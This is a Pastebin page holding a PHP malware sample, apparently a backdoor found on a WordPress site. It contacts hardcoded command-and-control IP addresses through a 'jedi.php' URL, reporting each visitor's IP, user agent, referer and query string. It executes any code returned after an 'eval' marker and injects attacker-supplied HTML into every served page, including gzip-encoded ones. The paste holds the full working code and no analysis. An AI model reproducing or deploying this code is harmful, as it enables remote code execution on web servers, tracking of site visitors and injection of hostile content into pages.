Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- if (!function_exists("GetMama")) {
- function mod_con($buf)
- {
- str_ireplace("<body>", "<body>", $buf, $cnt_h);
- if ($cnt_h == 1) {
- $buf = str_ireplace("<body>", "<body>" . stripslashes($_SERVER["good"]), $buf);
- return $buf;
- }
- str_ireplace("</body>", "</body>", $buf, $cnt_h);
- if ($cnt_h == 1) {
- $buf = str_ireplace("</body>", stripslashes($_SERVER["good"]) . "</body>", $buf);
- return $buf;
- }
- return $buf;
- }
- function opanki($buf)
- {
- $gz_e = false;
- $h_l = headers_list();
- if (in_array("Content-Encoding: gzip", $h_l)) {
- $gz_e = true;
- }
- if ($gz_e) {
- $tmpfname = tempnam("/tmp", "FOO");
- file_put_contents($tmpfname, $buf);
- $zd = gzopen($tmpfname, "r");
- $contents = gzread($zd, 10000000);
- $contents = mod_con($contents);
- gzclose($zd);
- unlink($tmpfname);
- $contents = gzencode($contents);
- } else {
- $contents = mod_con($buf);
- }
- $len = strlen($contents);
- header("Content-Length: " . $len);
- return ($contents);
- }
- function GetMama()
- {
- $mother = "www.#########.com"; /* This is the infected domain running WP */
- return $mother;
- }
- ob_start("opanki");
- function ahfudflfzdhfhs($pa)
- {
- $mama = GetMama();
- $file = urlencode(__FILE__);
- if (isset($_SERVER["HTTP_HOST"])) {
- $host = $_SERVER["HTTP_HOST"];
- } else {
- $host = "";
- }
- if (isset($_SERVER["REMOTE_ADDR"])) {
- $ip = $_SERVER["REMOTE_ADDR"];
- } else {
- $ip = "";
- }
- if (isset($_SERVER["HTTP_REFERER"])) {
- $ref = urlencode($_SERVER["HTTP_REFERER"]);
- } else {
- $ref = "";
- }
- if (isset($_SERVER["HTTP_USER_AGENT"])) {
- $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
- } else {
- $ua = "";
- }
- if (isset($_SERVER["QUERY_STRING"])) {
- $qs = urlencode($_SERVER["QUERY_STRING"]);
- } else {
- $qs = "";
- }
- $url_0 = "http://" . $pa;
- $url_1 = "/jedi.php?version=0992&mother=" . $mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" . $ua . "&qs=" . $qs;
- $try = true;
- if (function_exists("curl_init")) {
- $ch = curl_init($url_0 . $url_1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_TIMEOUT, 3);
- $ult = trim(curl_exec($ch));
- $try = false;
- }
- if ((ini_get("allow_url_fopen")) && $try) {
- $ult = trim(@file_get_contents($url_0 . $url_1));
- $try = false;
- }
- if ($try) {
- $fp = fsockopen($pa, 80, $errno, $errstr, 30);
- if ($fp) {
- $out = "GET $url_1 HTTP/1.0\r\n";
- $out .= "Host: $pa\r\n";
- $out .= "Connection: Close\r\n\r\n";
- fwrite($fp, $out);
- $ret = "";
- while (!feof($fp)) {
- $ret .= fgets($fp, 128);
- }
- fclose($fp);
- $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
- }
- }
- if (strpos($ult, "eval") !== false) {
- $z = stripslashes(str_replace("eval", "", $ult));
- eval($z);
- exit();
- }
- if (strpos($ult, "ebna") !== false) {
- $_SERVER["good"] = str_replace("ebna", "", $ult);
- return true;
- } else {
- return false;
- }
- }
- $father2[] = "77.81.241.253";
- $father2[] = "184.82.117.110";
- $father2[] = "46.249.58.135";
- $father2[] = "176.9.241.150";
- $father2[] = "46.37.169.56";
- $father2[] = "94.242.255.35";
- $father2[] = "178.162.129.223";
- $father2[] = "78.47.184.33";
- $father2[] = "31.184.234.96";
- shuffle($father2);
- foreach ($father2 as $ur) {
- if (ahfudflfzdhfhs($ur)) {
- break;
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement